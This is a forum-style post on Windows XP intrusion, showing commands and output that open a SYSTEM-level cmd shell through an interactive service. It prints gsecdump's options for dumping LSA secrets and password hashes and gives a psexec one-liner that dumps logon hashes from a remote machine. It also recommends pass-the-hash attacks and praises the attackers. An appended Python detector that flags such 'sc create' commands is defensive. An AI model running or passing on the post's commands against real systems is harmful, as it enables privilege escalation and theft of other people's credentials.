To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are impressive; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; it is just a matter of using the tool. As the original puts it well: no matter whether the password is set to 4 characters or 127, once you have the hash, it is 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
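From the defender's side, the service trick above leaves a single `sc create` command line in process-creation auditing, so it is cheap to catch. The following Python check is an added example (not code from the original post or from TrueSec): it parses sc's `name= value` option syntax, including a repeated `type=`, and flags the two traits of this technique, an interpreter as the service image and `type= interact`. The interpreter shortlist and the sample command line are assumptions constructed for the example.

```python
import re

# Interpreters that should never be a service image (assumed shortlist; extend as needed).
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

def tokenize(cmdline):
    """Split on whitespace, keeping double-quoted runs together (quotes dropped)."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def parse_sc_create(cmdline):
    """Return (service_name, options) for an 'sc create' command line, else None.
    sc.exe options look like 'name= value' (space after '=' is mandatory) and
    'type=' may be repeated, so every option maps to a list of values."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[0].lower() not in ("sc", "sc.exe") or toks[1].lower() != "create":
        return None
    name, opts, j = toks[2], {}, 3
    while j < len(toks):
        if toks[j].endswith("="):  # option name; its value is the next token
            opts.setdefault(toks[j][:-1].lower(), []).append(toks[j + 1] if j + 1 < len(toks) else "")
            j += 2
        else:
            j += 1
    return name, opts

def assess_sc_create(cmdline):
    """Flag service definitions that would hand out a shell running as SYSTEM."""
    parsed = parse_sc_create(cmdline)
    if parsed is None:
        return []
    name, opts = parsed
    findings = []
    binpath = opts.get("binpath", [""])[0]
    m = re.match(r"(.*?\.exe)\b", binpath, re.IGNORECASE)  # executable before its arguments
    image = m.group(1).rsplit("\\", 1)[-1].lower() if m else ""
    if image in SHELL_BINARIES:
        findings.append(f"{name}: service image is an interpreter ({image})")
    if any(v.lower() == "interact" for v in opts.get("type", [])):
        findings.append(f"{name}: SERVICE_INTERACTIVE_PROCESS requested (type= interact)")
    return findings

# Constructed sample: the command line from the post, as process auditing would record it.
PAGE_CMDLINE = 'sc create shellcmdline binpath= "C:\\WINDOWS\\system32\\cmd.exe /K start" type= own type= interact'
```

Feeding `PAGE_CMDLINE` to `assess_sc_create` yields both findings, while an ordinary agent registration such as `sc create backupagent binpath= "C:\Program Files\Backup\agent.exe --service" start= auto` yields none.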